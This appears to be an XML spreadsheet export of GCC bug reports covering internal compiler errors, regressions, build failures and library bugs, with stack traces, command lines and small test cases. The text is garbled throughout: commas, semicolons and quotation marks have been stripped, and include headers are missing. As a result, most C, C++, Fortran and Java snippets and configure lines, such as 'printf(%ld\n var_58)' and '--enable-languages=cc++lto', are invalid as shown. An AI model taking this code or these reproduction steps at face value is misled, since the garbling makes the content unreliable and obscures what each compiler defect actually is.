COLLECT_GCC=g++-trunk
COLLECT_LTO_WRAPPER=/usr/local/gcc-trunk/libexec/gcc/x86_64-pc-linux-gnu/7.0.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: ../gcc-source-trunk/configure --enable-languages=cc++lto --prefix=/usr/local/gcc-trunk --disable-bootstrap
Thread model: posix
gcc version 7.0.0 20160918 (experimental) [trunk revision 240220] (GCC)
$
$ g++-trunk small.C
small.C:1:6: internal compiler error: Segmentation fault
 int[[...]] a
      ^~~
0xdc7baf crash_signal
        ../../gcc-source-trunk/gcc/toplev.c:336
0x78a1cb tree_check
        ../../gcc-source-trunk/gcc/tree.h:3025
0x78a1cb cp_parser_std_attribute_list
        ../../gcc-source-trunk/gcc/cp/parser.c:24223
0x78a1cb cp_parser_std_attribute_spec
        ../../gcc-source-trunk/gcc/cp/parser.c:24289
0x78a1cb cp_parser_std_attribute_spec_seq
        ../../gcc-source-trunk/gcc/cp/parser.c:24377
0x78d94f cp_parser_decl_specifier_seq
        ../../gcc-source-trunk/gcc/cp/parser.c:12694
0x79a9c1 cp_parser_simple_declaration
        ../../gcc-source-trunk/gcc/cp/parser.c:12416
0x79ae66 cp_parser_block_declaration
        ../../gcc-source-trunk/gcc/cp/parser.c:12363
0x7a3d14 cp_parser_declaration
        ../../gcc-source-trunk/gcc/cp/parser.c:12260
0x7a28af cp_parser_declaration_seq_opt
        ../../gcc-source-trunk/gcc/cp/parser.c:12139
0x7a2bf8 cp_parser_translation_unit
        ../../gcc-source-trunk/gcc/cp/parser.c:4356
0x7a2bf8 c_parse_file()
        ../../gcc-source-trunk/gcc/cp/parser.c:37714
0x917b92 c_common_parse_file()
        ../../gcc-source-trunk/gcc/c-family/c-opts.c:1073
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$
$ cat small.C
int[[...]] a
$</t>
  </si>
  <si>
    <t>GCC-5612</t>
  </si>
  <si>
    <t>broken links to Goldberg fp paper</t>
  </si>
  <si>
    <t>I have found two problems with the web page
      http://gcc.gnu.org/readings.html
in the Miscellaneous information section:
1.  The link What Every Computer Scientist Should Know
    about Floating-Point Arithmetic points to an online
    version in the ACM digital library.  This doesn't appear
    to provide full text without a paid subscription (at least
    I haven't been able to get the full text from it).
    I suggest we change the link to point to one of the
    freely available versions of this same document on
    the web such as
        http://www.validlab.com/goldberg/paper.ps
    and/or
        http://www.validlab.com/goldberg/paper.pdf
2. The link Differences in IEEE 754 Implementations
   (an appendix of the Goldberg paper) points to a site
    that has moved.  The new url is
        http://www.validlab.com/goldberg/addendum.html
Release:
problem with web page http://gcc.gnu.org/readings.html</t>
  </si>
  <si>
    <t>jthorn</t>
  </si>
  <si>
    <t>GCC-9785</t>
  </si>
  <si>
    <t>Internal compiler error 192 when trying to assign local value to a local classes member.</t>
  </si>
  <si>
    <t>I get an internal compiler error instead of a proper message. I'm assuming this is incorrect c++ but either way it should report why.
# 1 test.cc
void main()
{
    int local = 3
    class { public: static const int x = local } b
}
Release:
2.95.3 20010315
Environment:
NetBSD 1.6
How-To-Repeat:
Simply compile the above code.</t>
  </si>
  <si>
    <t>gnuser</t>
  </si>
  <si>
    <t>GCC-32225</t>
  </si>
  <si>
    <t>[PTR-PLUS] ICE in alias.c with INDIRECT_REF to a INTEGER_TYPE</t>
  </si>
  <si>
    <t>quantize_fs_dither (unsigned width short *errorptr int dir)
{
  short bpreverr
  unsigned col
  for (col = width col &gt; 0 col--) 
    errorptr += dir
  errorptr[0] = (short) bpreverr
}
SCCP goes funny for this (have not looked why yet).</t>
  </si>
  <si>
    <t>GCC-21655</t>
  </si>
  <si>
    <t>g++.dg/tree-ssa/pr14814.C scan-tree-dump-times &amp;this 0 fails</t>
  </si>
  <si>
    <t>FAIL: g++.dg/tree-ssa/pr14814.C scan-tree-dump-times &amp;this 0
appeared on mainline most or all platforms 20050518.  This is a new testcase
but presumptively a regression because bug 14814 was reportedly fixed in 4.0.0.</t>
  </si>
  <si>
    <t>GCC-9660</t>
  </si>
  <si>
    <t>use of template keyword to specify templated method cause ICE</t>
  </si>
  <si>
    <t>the use of template keyword for template specialisation appearing in a postfix expression (ISO 14882 14.2.4) is causing an internal compiler error.
the attached file compiled without options reproduce the ICE.
Release:
gcc 3.0.1
Environment:
HP-UX B.11.11</t>
  </si>
  <si>
    <t>maudouy</t>
  </si>
  <si>
    <t>GCC-46010</t>
  </si>
  <si>
    <t>I/O: Namelist-reading bug</t>
  </si>
  <si>
    <t>Created attachment 22032
program with the struct and input namelist file
I compiled the NEMO ocean model (revision 1162) with gfortran.  If I now run the program I get nonsense (random memory) data written in the 2nd 4th 6th etc. ocean tracer entry in my output.  The relevant code and namelist file needed for compilation and the relevant output are attached to this e-mail.
This problem arises with gfortran 4.1.2 (RHEL) 4.4.5 (Debian) and 4.5.1 (Arch) but it doesn't with the Intel Fortran Compiler (ifort).  Please let me know if you need other information.</t>
  </si>
  <si>
    <t>GCC-60032</t>
  </si>
  <si>
    <t>[4.9 regression] ICE in reload_cse_simplify_operands at postreload.c:411</t>
  </si>
  <si>
    <t>$ ./gcc/xg++ -shared-libgcc -B./gcc -nostdinc++ -Lpowerpc64-linux/32/libstdc++-v3/src -Lpowerpc64-linux/32/libstdc++-v3/src/.libs -Lpowerpc64-linux/32/libstdc++-v3/libsupc++/.libs -B/usr/powerpc64-linux/bin/ -B/usr/powerpc64-linux/lib/ -isystem /usr/powerpc64-linux/include -isystem /usr/powerpc64-linux/sys-include -m32 -BBuild/powerpc64-linux/32/libstdc++-v3/src/.libs -fdiagnostics-color=never -D_GLIBCXX_ASSERT -fmessage-length=0 -ffunction-sections -fdata-sections -O2 -g -D_GNU_SOURCE -O2 -g -D_GNU_SOURCE -DLOCALEDIR=. -nostdinc++ -Ipowerpc64-linux/32/libstdc++-v3/include/powerpc64-linux -Ipowerpc64-linux/32/libstdc++-v3/include -I../libstdc++-v3/libsupc++ -I../libstdc++-v3/include/backward -I../libstdc++-v3/testsuite/util ../libstdc++-v3/testsuite/decimal/pr54036-1.cc -include bits/stdc++.h powerpc64-linux/libstdc++-v3/testsuite/libtestc++.a -Wl--gc-sections -lm -m32 -o ./pr54036-1.exe
../libstdc++-v3/testsuite/decimal/pr54036-1.cc: In function â€˜int main()â€™:
../libstdc++-v3/testsuite/decimal/pr54036-1.cc:71:1: error: insn does not satisfy its constraints:
 }
 ^
(insn 274 273 172 14 (set (reg:DD 31 31)
        (mem/c:DD (plus:SI (reg/f:SI 1 1)
                (const_int 32 [0x20])) [0  S8 A64])) powerpc64-linux/32/libstdc++-v3/include/decimal/decimal.h:298 445 {*movdd_hardfloat32}
     (nil))
../libstdc++-v3/testsuite/decimal/pr54036-1.cc:71:1: internal compiler error: in reload_cse_simplify_operands at postreload.c:411
0x1061c50b _fatal_insn(char const* rtx_def const* char const* int char const*)
        ../../gcc/rtl-error.c:109
0x1061c55f _fatal_insn_not_found(rtx_def const* char const* int char const*)
        ../../gcc/rtl-error.c:120
0x105c7e23 reload_cse_simplify_operands
        ../../gcc/postreload.c:411
0x105c9f53 reload_cse_simplify
        ../../gcc/postreload.c:181
0x105c9f53 reload_cse_regs_1
        ../../gcc/postreload.c:220
0x105ca537 reload_cse_regs
        ../../gcc/postreload.c:68
0x105ca537 rest_of_handle_postreload
        ../../gcc/postreload.c:2332
0x105ca537 execute
        ../../gcc/postreload.c:2368</t>
  </si>
  <si>
    <t>GCC-33062</t>
  </si>
  <si>
    <t>ICE in emit_move_insn and expand_call with -fdefault-integer-8</t>
  </si>
  <si>
    <t>gfortran produces an internal compiler error under the following conditions:
1. A logical function is being evaluated
2. The flag -f-default-integer-8 is specified
3. The August 10 snapshot versions of gcc and gfortran are compiled under HP-PA. I have not tested this snapshot with other architectures nor have I tested the HP-PA architecture with other versions of gcc.
Listed below are two examples:
LOGICAL FUNCTION x()
x = .FALSE.
END FUNCTION x
a.f90: In function 'x':
a.f90:1: internal compiler error: in emit_move_insn at expr.c:3316
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
PROGRAM axis
LOGICAL :: x y
y = x()
END PROGRAM axis
x.f90: In function 'MAIN__':
x.f90:3: internal compiler error: in expand_call at calls.c:3022
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-25117</t>
  </si>
  <si>
    <t>GNAT Bug Box GCC error verify_ssa failed</t>
  </si>
  <si>
    <t>Happens when compiling the sources of AdaCore's
AWS checked out 2005-11-26 public CVS
cvs -d :pserver:anoncvs@libre.adacore.com:/anoncvs co AWS
$ make setup
$ make build
...
gcc -c -gnatwecfijkmruv -gnaty3abcefhiklmnoprstx -Wall -O2 -gnatn -I- -gnatA /werkstatt/src/AWS/src/aws-containers-key_value.ads
+===========================GNAT BUG DETECTED==============================+
| 4.1.0 20051124 (prerelease) (i686-pc-linux-gnu) GCC error:               |
| in expand_expr_addr_expr_1 at expr.c:6306                               |
| No source file position information available                            |
| Please submit a bug report see http://gcc.gnu.org/bugs.html.            |
| Use a subject line meaningful to you and us to track the bug.            |
| Include the entire contents of this bug box in the report.               |
| Include the exact gcc or gnatmake command that you entered.              |
| Also include sources listed below in gnatchop format                     |
| (concatenated together with no headers between files).                   |
+==========================================================================+
Please include these source files with error report
Note that list may not be accurate in some cases
so please double check that the problem can still
be reproduced with the set of files listed.
/werkstatt/src/AWS/src/aws-containers-key_value.ads
/werkstatt/src/AWS/src/aws-containers.ads
/werkstatt/src/AWS/src/aws.ads
/werkstatt/src/AWS/include/strings_maps.ads
/werkstatt/src/AWS/include/ai302/ai302.ads
/werkstatt/src/AWS/include/ai302/ai302-containers.ads
/werkstatt/src/AWS/include/ai302/ai302-containers-indefinite_hashed_maps.ads
/werkstatt/src/AWS/include/ai302/ai302-containers-hash_tables.ads
/werkstatt/src/AWS/include/ai302/ai302-strings.ads
/werkstatt/src/AWS/include/ai302/ai302-strings-hash.ads
/werkstatt/src/AWS/include/ai302/ai302-containers-indefinite_hashed_maps.adb
/werkstatt/src/AWS/include/ai302/ai302-containers-hash_tables.adb
/werkstatt/src/AWS/include/ai302/ai302-containers-prime_numbers.ads
raised TYPES.UNRECOVERABLE_ERROR : comperr.adb:380
gnatmake: /werkstatt/src/AWS/src/aws-containers-key_value.ads compilation error
make[1]: *** [build] Error 4
make: *** [src_build] Error 2
Using built-in specs.
Target: i686-pc-linux-gnu
Configured with: ../src/gcc/configure --enable-languages=cadac++fortran --disable-nls
Thread model: posix
gcc version 4.1.0 20051124 (prerelease)
Linux sonnenregen 2.6.12-10-386 #1 Fri Nov 18 11:51:02 UTC 2005 i686 GNU/Linux</t>
  </si>
  <si>
    <t>GCC-65439</t>
  </si>
  <si>
    <t>[5 Regression] FAIL: g++.dg/ipa/ipa-icf-4.C  -std=gnu++98  scan-ipa-dump icf Equal symbols: 6</t>
  </si>
  <si>
    <t>In revision 221432:
Executing on host: /test/gnu/gcc/objdir/gcc/testsuite/g++/../../xg++ -B/test/gnu
/gcc/objdir/gcc/testsuite/g++/../../ /test/gnu/gcc/gcc/gcc/testsuite/g++.dg/ipa/
ipa-icf-4.C  -fno-diagnostics-show-caret -fdiagnostics-color=never  -nostdinc++
-I/test/gnu/gcc/objdir/hppa2.0w-hp-hpux11.11/libstdc++-v3/include/hppa2.0w-hp-hp
ux11.11 -I/test/gnu/gcc/objdir/hppa2.0w-hp-hpux11.11/libstdc++-v3/include -I/tes
t/gnu/gcc/gcc/libstdc++-v3/libsupc++ -I/test/gnu/gcc/gcc/libstdc++-v3/include/ba
ckward -I/test/gnu/gcc/gcc/libstdc++-v3/testsuite/util -fmessage-length=0  -std=
gnu++98 -O2 -fdump-ipa-icf -fno-inline  -S   -o ipa-icf-4.s    (timeout = 300)
spawn /test/gnu/gcc/objdir/gcc/testsuite/g++/../../xg++ -B/test/gnu/gcc/objdir/g
cc/testsuite/g++/../../ /test/gnu/gcc/gcc/gcc/testsuite/g++.dg/ipa/ipa-icf-4.C -
fno-diagnostics-show-caret -fdiagnostics-color=never -nostdinc++ -I/test/gnu/gcc
/objdir/hppa2.0w-hp-hpux11.11/libstdc++-v3/include/hppa2.0w-hp-hpux11.11 -I/test
/gnu/gcc/objdir/hppa2.0w-hp-hpux11.11/libstdc++-v3/include -I/test/gnu/gcc/gcc/l
ibstdc++-v3/libsupc++ -I/test/gnu/gcc/gcc/libstdc++-v3/include/backward -I/test/
gnu/gcc/gcc/libstdc++-v3/testsuite/util -fmessage-length=0 -std=gnu++98 -O2 -fdu
mp-ipa-icf -fno-inline -S -o ipa-icf-4.s
PASS: g++.dg/ipa/ipa-icf-4.C  -std=gnu++98 (test for excess errors)
PASS: g++.dg/ipa/ipa-icf-4.C  -std=gnu++98  scan-ipa-dump icf (Unified Variabl
e alias has been created)|(Symbol aliases are not supported by target)
FAIL: g++.dg/ipa/ipa-icf-4.C  -std=gnu++98  scan-ipa-dump icf Equal symbols: 6
Revision 221202 was okay.</t>
  </si>
  <si>
    <t>GCC-3953</t>
  </si>
  <si>
    <t>compiler accepts invalid type modes</t>
  </si>
  <si>
    <t>An attribute that specifies a floating-point mode for
an integer or vice versa is accepted -- but chaos
ensues.
Release:
3.0
How-To-Repeat:
Compile the attached file.  On i686-pc-linux-gnu 
bash-2.04$ ~/dev/gcc-3.0/objdir/gcc/cc1 attribute1.c  
 x
attribute1.c: In function `x':
attribute1.c:15: Internal compiler error in convert_move at expr.c:515</t>
  </si>
  <si>
    <t>GCC-41203</t>
  </si>
  <si>
    <t>-mtune=pentium2 structure related tree-outof-ssa internal compiler error</t>
  </si>
  <si>
    <t>There seems to be a tree-ssa related structure member assignment problem that affects  gcc -m32  -{OO2O3Os} -mtune=pentium2  but apparently nothing else.
Removing the if statement out of the set_foo function also avoids the bug.
Screen shot:
$ gcc --version
gcc (GCC) 4.5.0 20090809 (experimental)
$ gcc -Os -m32 -march=i686 -mtune=pentium2 -c -o block/blk-settings.o /tmp/blk-settings2.c
/tmp/blk-settings2.c: In function 'set_foo':
/tmp/blk-settings2.c:9:6: internal compiler error: in insert_value_copy_on_edge at tree-outof-ssa.c:223
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Code:
/* insert_value_copy_on_edge at tree-outof-ssa.c:223
 * gcc (GCC) 4.5.0 20090809 (experimental)
 * platform x86_64-unknown-linux-gnu */
struct foo
{
    unsigned short foo
}
void set_foo(struct foo *p unsigned short bar)
{
    if (!bar)
	bar = 1
    p-&gt;foo = bar
}</t>
  </si>
  <si>
    <t>dps</t>
  </si>
  <si>
    <t>GCC-27043</t>
  </si>
  <si>
    <t>building Ada rts does not find 'as'</t>
  </si>
  <si>
    <t>Building on Windows XPSP2 NTFS file system using MSYS 1.0.10.
If I don't specify --with-as to configure the compilers (all) build well until stage3.  Only when the stage3 compiler starts building the Ada run time system it cannot find 'as' anymore:
rm -f ../stamp-gnatlib
touch ../stamp-gnatlib1
make -C rts \
        CC=`echo \./xgcc -B./ \ \
        | sed -e 's^\./xgcc../../xgcc' -e 's-B\./-B../../'` \
        INCLUDES=-I. -I.. -I../.. -I/d/Data/Development/gcc-cvs/gcc-4.1.0/gcc/ada -I/d/Data/Development/gcc-cvs/gcc-4.1.0/gcc/ada/../config -I/d/Data/Development/gcc-cvs/gcc-4.1.0/gcc/ada/../../include -I/d/Data/Development/gcc-cvs/gcc-4.1.0/gcc/ada/.. -I./../.. \
                CFLAGS=-g -O2   -fexceptions -DIN_RTS \
        srcdir=/d/Data/Development/gcc-cvs/gcc-4.1.0/gcc/ada \
        -f ../Makefile adaint.o argv.o cio.o cstreams.o ctrl_c.o errno.o exit.o raise.o sysdep.o aux-io.o init.o initialize.o seh_init.o cal.o final.o tracebak.o expect.o mkdir.o socket.o raise-gcc.o
make[7]: Entering directory `/d/Data/Development/gcc-cvs/build_4.1.0/gcc/ada/rts'
../../xgcc -B../../  -c -DIN_GCC   `echo -g -O2   -fexceptions -DIN_RTS |sed -e 's/-pedantic//g' -e 's/-Wtraditional//g'`      -I. -I.. -I../.. -I/d/Data/Development/gcc-cvs/gcc-4.1.0/gcc/ada -I/d/Data/Development/gcc-cvs/gcc-4.1.0/gcc/ada/../config -I/d/Data/Development/gcc-cvs/gcc-4.1.0/gcc/ada/../../include -I/d/Data/Development/gcc-cvs/gcc-4.1.0/gcc/ada/.. -I./../.. adaint.c \
  -o adaint.o
..\..\as: ..\..\as: No such file or directory
make[7]: *** [adaint.o] Error 1
make[7]: Leaving directory `/d/Data/Development/gcc-cvs/build_4.1.0/gcc/ada/rts'
make[6]: *** [gnatlib] Error 2
make[6]: Leaving directory `/d/Data/Development/gcc-cvs/build_4.1.0/gcc/ada'
make[5]: *** [gnatlib-shared-win32] Error 2
make[5]: Leaving directory `/d/Data/Development/gcc-cvs/build_4.1.0/gcc/ada'
make[4]: *** [gnatlib-shared] Error 2
make[4]: Leaving directory `/d/Data/Development/gcc-cvs/build_4.1.0/gcc/ada'
make[3]: *** [gnatlib-shared] Error 2
make[3]: Leaving directory `/d/Data/Development/gcc-cvs/build_4.1.0/mingw32/libada'
make[2]: *** [all-target-libada] Error 2
make[2]: Leaving directory `/d/Data/Development/gcc-cvs/build_4.1.0'
make[1]: *** [all] Error 2
make[1]: Leaving directory `/d/Data/Development/gcc-cvs/build_4.1.0'
make: *** [bootstrap] Error 2
The MinGW/MSYS maintainers suggested a bug report here rather than in MinGW bug-db.
   Rolf</t>
  </si>
  <si>
    <t>rolf.ebert.gcc</t>
  </si>
  <si>
    <t>GCC-19266</t>
  </si>
  <si>
    <t>[mudflap] ICE when compiling with -fmudflap -O</t>
  </si>
  <si>
    <t>Current g++ produces an ICE when trying to compile the attached test case.
Sorry I had no time today to try a reduction so it is very large.
I'll try to find a shorter testcase as soon as I have more time.
BTW which component should I use for bug reports concerning mudflap itself
(not libmudflap)?
~/data/planck/LevelS&gt;g++ -v -c -O -fmudflap testcase.ii
Using built-in specs.
Configured with: /scratch/gcc/configure --quiet
--prefix=/afs/mpa/data/martin/ugcc --enable-languages=c++f95
--with-gmp=/afs/mpa/data/martin/mygmp
Thread model: posix
gcc version 4.0.0 20050105 (experimental)
 /afs/mpa/data/martin/ugcc/libexec/gcc/i686-pc-linux-gnu/4.0.0/cc1plus
-fpreprocessed testcase.ii -quiet -dumpbase testcase.ii -mtune=pentiumpro
-auxbase testcase -O -version -fmudflap -fno-builtin -fno-merge-constants -o
/tmp/ccrlkYrZ.s
GNU C++ version 4.0.0 20050105 (experimental) (i686-pc-linux-gnu)
        compiled by GNU C version 4.0.0 20050105 (experimental).
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
cxxsupport/fitshandle.cc: In member function 'void fitshandle::init_bintab()':
cxxsupport/fitshandle.cc:99: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-81588</t>
  </si>
  <si>
    <t>[7/8 Regression] Wrong code at -O2</t>
  </si>
  <si>
    <t>gcc trunk rev250630 x86_64.
&gt; cat f.cpp
#include 
long int var_34 = 5011877430933453486L
unsigned short var_82 = 24847
long int var_58 = 1
void foo() {
  if (var_82 &gt; var_34 ^ true + (var_34 &lt; 0))
    var_58 = 0
}
int main() {
  foo()
  printf(%ld\n var_58)
  return 0
}
&gt; g++ -O0 f.cpp -o out ./out
0
&gt; g++ -O2 f.cpp -o out ./out
1</t>
  </si>
  <si>
    <t>GCC-56841</t>
  </si>
  <si>
    <t>[4.9 Regression] ld: Unsatisfied symbol __atomic_exchange_8 in file /test/gnu/gcc/objdir/prev-hppa64-hp-hpux11.11/libstdc++-v3/src/.libs/libstdc++.a[eh_terminate.o]</t>
  </si>
  <si>
    <t>/test/gnu/gcc/objdir/./prev-gcc/xg++ -B/test/gnu/gcc/objdir/./prev-gcc/ -B/opt/g
nu64/gcc/gcc-4.8/hppa64-hp-hpux11.11/bin/ -nostdinc++ -B/test/gnu/gcc/objdir/prev-hppa64-hp-hpux11.11/libstdc++-v3/src/.libs -B/test/gnu/gcc/objdir/prev-hppa64-
hp-hpux11.11/libstdc++-v3/libsupc++/.libs -I/test/gnu/gcc/objdir/prev-hppa64-hp-hpux11.11/libstdc++-v3/include/hppa64-hp-hpux11.11 -I/test/gnu/gcc/objdir/prev-hppa64-hp-hpux11.11/libstdc++-v3/include -I/test/gnu/gcc/gcc/libstdc++-v3/libsupc
++ -L/test/gnu/gcc/objdir/prev-hppa64-hp-hpux11.11/libstdc++-v3/src/.libs -L/tes
t/gnu/gcc/objdir/prev-hppa64-hp-hpux11.11/libstdc++-v3/libsupc++/.libs   -g -O2 -DIN_GCC   -fno-exceptions -fno-rtti -fasynchronous-unwind-tables -W -Wall -Wno-
narrowing -Wwrite-strings -Wcast-qual -Wmissing-format-attribute -pedantic -Wno-
long-long -Wno-variadic-macros -Wno-overlength-strings -Werror -fno-common  -DHA
VE_CONFIG_H -static-libstdc++ -static-libgcc  -o cpp gcc.o ggc-none.o \
          c-family/cppspec.o  libcommon-target.a \
           libcommon.a ../libcpp/libcpp.a   ../libbacktrace/.libs/libbacktrace.a
 ../libiberty/libiberty.a ../libdecnumber/libdecnumber.a 
ld: Unsatisfied symbol ld: Unsatisfied symbol __atomic_exchange_8 in file /te
st/gnu/gcc/objdir/prev-hppa64-hp-hpux11.11/libstdc++-v3/src/.libs/libstdc++.a[eh
_terminate.o]
1 errors.
__atomic_exchange_8 in file /test/gnu/gcc/objdir/prev-hppa64-hp-hpux11.11/libst
dc++-v3/src/.libs/libstdc++.a[eh_terminate.o]
1 errors.
collect2: error: ld returned 1 exit status
collect2: error: ld returned 1 exit status
make[3]: *** [xgcc] Error 1
make[3]: *** Waiting for unfinished jobs....
make[3]: *** [cpp] Error 1
rm cpp.pod gfdl.pod gcov.pod fsf-funding.pod gcc.pod
make[3]: Leaving directory `/test/gnu/gcc/objdir/gcc'
make[2]: *** [all-stage2-gcc] Error 2
make[2]: Leaving directory `/test/gnu/gcc/objdir'
make[1]: *** [stage2-bubble] Error 2
make[1]: Leaving directory `/test/gnu/gcc/objdir'
make: *** [bootstrap] Error 2
Thu Apr  4 02:15:38 EDT 2013</t>
  </si>
  <si>
    <t>GCC-8823</t>
  </si>
  <si>
    <t>gij doesn't handle Miranda methods (abstract class that implements interface but doesn't define all methods)</t>
  </si>
  <si>
    <t>_Jv_ResolvePoolEntry doesn't lookup methods in (abstract) superclasses that (didn't) implement an Interface method.
The following code shows the problem:
When compiled with gcj -C *.java and run with gij C it throws:
Exception in thread main java.lang.NoSuchMethodError: method A.m was not found.
   at _Jv_ResolvePoolEntry(java.lang.Class int) (/usr/local/gcc33/lib/libgcj.so.3.0.0)
   at C.main(java.lang.String[]) (Unknown Source)
More background information (look for Miranda) can be found at the IK.VM.NET weblog of Jeroen Frijters:
http://radio.weblogs.com/0109845/2002/11/22.html#a65
http://radio.weblogs.com/0109845/2002/11/25.html#a67
Release:
gij (GNU libgcj) version 3.3 20021205 (experimental)
How-To-Repeat:
Forgot to add the sample code. Here it is:
::::::::::::::
A.java
::::::::::::::
public abstract class A implements I
{
  // But doesn't define m()
}
::::::::::::::
C.java
::::::::::::::
public class C extends A // which means it implements I
{
  public static void main(String[] args)
  {
    // Defining c as either I or C will work.
    A c = new C()
    c.m()
  }
  public void m()
  {
    System.out.println(Hello World!)
  }
}
::::::::::::::
I.java
::::::::::::::
public interface I
{
  public void m()
}</t>
  </si>
  <si>
    <t>GCC-61968</t>
  </si>
  <si>
    <t>ICE (assembly failure) due to wrongly generating a vtable for TYPE(*) / BT_ASSUMED_TYPE</t>
  </si>
  <si>
    <t>Created attachment 33216
Testcase (test.f90)
Passing a TYPE(*) to CLASS(*) is properly rejected by the compiler thus there is no need to attempt to generate a virtual table for TYPE(*) â€“ ignoring the problem that TYPE(*) has no real type.
My suspicion is that this happens during resolving the generic call triggered by the CLASS - even though the actual class call isn't and shouldn't be done.
The generated function looks in assembly as follows - unsurprisingly the assembler stumbles over it:
        .type   __copy_TYPE(*)_0_.2366 @function
Credit for finding the issue goes to Jim.</t>
  </si>
  <si>
    <t>GCC-82011</t>
  </si>
  <si>
    <t>[8 regression] early lto debug causes dsymutil warning on Darwin</t>
  </si>
  <si>
    <t>Created attachment 42062
preprocessed input assembler output with -dA -fverbose-asm object file and executable
Since the early LTO debug patch has landed I'm seeing a large number of testsuite
regressions on Darwin e.g.
FAIL: g++.dg/torture/pr37922.C   -O3 -g  (test for excess errors)
warning: invalid DWARF generated by the compiler: DIE 0x0000241b has multiple  AT_inline attributes in '/var/folders/zz/zyxvpxvq6csfxvn_n000087r00021y/T//ccpTfHtT.o'.
The warning is from running dsymutil on the executable and indeed running
dwarfdump on the corresponding object file finds
0x0000241b:     TAG_subprogram [65] *
                 AT_specification( {0x00000d35} ( _ZN11rot_mx_infoC4ERK6rot_mx ) )
                 AT_decl_line( 469 )
                 AT_inline( DW_INL_not_inlined )
                 AT_inline( DW_INL_not_inlined )
                 AT_sibling( {0x00002481} )
I'm attaching preprocessed input etc. for reference.
  Rainer</t>
  </si>
  <si>
    <t>GCC-68091</t>
  </si>
  <si>
    <t>[6 Regression] [SH] internal compiler error: in expand_vec_cond_expr at optabs.c:5391</t>
  </si>
  <si>
    <t>The recent change of middle-end for vector operations causes some new
ICEs in the testsuite on sh4.  A Typical one is:
trunk/gcc/testsuite/g++.dg/ext/vector27.C:12:16: internal compiler error: in expand_vec_cond_expr at optabs.c:5391
0x877369f expand_vec_cond_expr(tree_node* tree_node* tree_node* tree_node* rtx_def*)
	../../ORIG/trunk/gcc/optabs.c:5390
0x8588a0e do_store_flag
	../../ORIG/trunk/gcc/expr.c:11052
0x8588a0e expand_expr_real_2(separate_ops* rtx_def* machine_mode expand_modifier)
	../../ORIG/trunk/gcc/expr.c:9010
0x846bb89 expand_gimple_stmt_1
	../../ORIG/trunk/gcc/cfgexpand.c:3617
It seems that the middle-end change reveals a target problem that
sh_vector_mode_supported_p returns true even the target has no mov
insns for some vector modes.
 bool
 sh_vector_mode_supported_p (machine_mode mode)
 {
   if (TARGET_FPU_ANY
       &amp;&amp; ((mode == V2SFmode)
          || (mode == V4SFmode)
          || (mode == V16SFmode)))
     return true
   ...
It looks that this TARGET_FPU_ANY should be TARGET_SHMEDIA_FPU in
the first place because all movv* patterns in sh.md are written for
SHMEDIA only.  The ICEs seen only on sh4 went away with replacing
TARGET_FPU_ANY with TARGET_SHMEDIA_FPU in sh_vector_mode_supported_p.
Although I know that we shouldn't add the new sh5 hunks I think
that this change is rather a preparation to zap them out.</t>
  </si>
  <si>
    <t>GCC-40033</t>
  </si>
  <si>
    <t>[4.5 regression] ICE with invalid statement expression</t>
  </si>
  <si>
    <t>The following invalid testcase triggers an ICE on trunk:
==================
void foo()
{
  ({ 0 })
}
==================
bug.c: In function 'foo':
bug.c:3: error: expected expression before '' token
bug.c:3: internal compiler error: tree check: expected class 'type' have 'exceptional' (error_mark) in useless_type_conversion_p_1 at tree-ssa.c:900
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-67362</t>
  </si>
  <si>
    <t>std::regex(((.) std::regex_constants::basic) throws</t>
  </si>
  <si>
    <t>#include 
#include 
int main()
{
  std::regex re(((.) std::regex_constants::basic)
}
terminate called after throwing an instance of 'std::regex_error'
  what():  regex_error
Aborted (core dumped)
For a POSIX BRE neither '(' nor ')' should be special so this should not fail.</t>
  </si>
  <si>
    <t>timshen</t>
  </si>
  <si>
    <t>GCC-38919</t>
  </si>
  <si>
    <t>math_stubs_long_double.cc: error: redefinition of 'long double ...' vs. /usr/x86_64-mingw32/include/math.h</t>
  </si>
  <si>
    <t>building 4.4 snap with mingw-w64-snapshot-20081115.tar.bz2 ends with:
(...)
libtool: compile:  /home/users/pluto/rpm/BUILD/gcc-4.4-20090116/BUILDDIR/./gcc/xgcc -shared-libgcc -B/home/users/pluto/rpm/BUILD/gcc-4.4-20090116/BUILDDIR/./gcc -nostdinc++ -L/home/users/pluto/rpm/BUILD/gcc-4.4-20090116/BUILDDIR/x86_64-mingw32/libstdc++-v3/src -L/home/users/pluto/rpm/BUILD/gcc-4.4-20090116/BUILDDIR/x86_64-mingw32/libstdc++-v3/src/.libs -L/home/users/pluto/rpm/BUILD/gcc-4.4-20090116/BUILDDIR/x86_64-mingw32/winsup/mingw -L/home/users/pluto/rpm/BUILD/gcc-4.4-20090116/BUILDDIR/x86_64-mingw32/winsup/w32api/lib -isystem /home/users/pluto/rpm/BUILD/gcc-4.4-20090116/winsup/mingw/include -isystem /home/users/pluto/rpm/BUILD/gcc-4.4-20090116/winsup/w32api/include -B/usr/x86_64-mingw32/bin/ -B/usr/x86_64-mingw32/lib/ -isystem /usr/x86_64-mingw32/include -isystem /usr/x86_64-mingw32/sys-include -I/home/users/pluto/rpm/BUILD/gcc-4.4-20090116/BUILDDIR/x86_64-mingw32/libstdc++-v3/include/x86_64-mingw32 -I/home/users/pluto/rpm/BUILD/gcc-4.4-20090116/BUILDDIR/x86_64-mingw32/libstdc++-v3/include -I/home/users/pluto/rpm/BUILD/gcc-4.4-20090116/libstdc++-v3/libsupc++ -fno-implicit-templates -Wall -Wextra -Wwrite-strings -Wcast-qual -fdiagnostics-show-location=once -ffunction-sections -fdata-sections -g -O2 -fno-strict-aliasing -fwrapv -march=x86-64 -c ../../../../libstdc++-v3/src/math_stubs_long_double.cc  -DDLL_EXPORT -DPIC -o .libs/math_stubs_long_double.o
../../../../libstdc++-v3/src/math_stubs_long_double.cc: In function 'long double fabsl(long double)':
../../../../libstdc++-v3/src/math_stubs_long_double.cc:40: error: redefinition of 'long double fabsl(long double)'
/usr/x86_64-mingw32/include/math.h:181: error: 'long double fabsl(long double)' previously defined here
